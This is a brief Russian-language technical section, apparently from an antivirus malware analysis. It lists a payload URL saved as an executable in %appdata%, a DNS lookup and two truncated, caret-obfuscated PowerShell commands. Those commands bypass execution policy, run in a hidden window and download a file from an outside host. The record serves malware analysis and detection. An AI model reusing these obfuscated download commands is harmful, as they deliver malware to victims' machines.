Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^w^e^r^s^H^eL^L.exE -^eX^e^c^uTiONPOl^Icy byPa^SS -nOproF^Il^e^ -WiN^DowSTylE HIDDen (^NE^w-Ob^JECT^ ^S^YS^tE^m.net^.WEBCLie^NT^).d^OWN^Load^fIle^('http://www.fopeioaas.to...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "Po^w^e^r^s^H^eL^L.exE -^eX^e^c^uTiONPOl^Icy byPa^SS -nOproF^Il^e^ -WiN^DowSTylE HIDDen (^NE^w-Ob^JECT^ ^S^YS^tE^m.net^.WEBCLie^NT^).d^OWN^Load^fIle^('http://www.fopeioaas.to...' (со скрытым окном)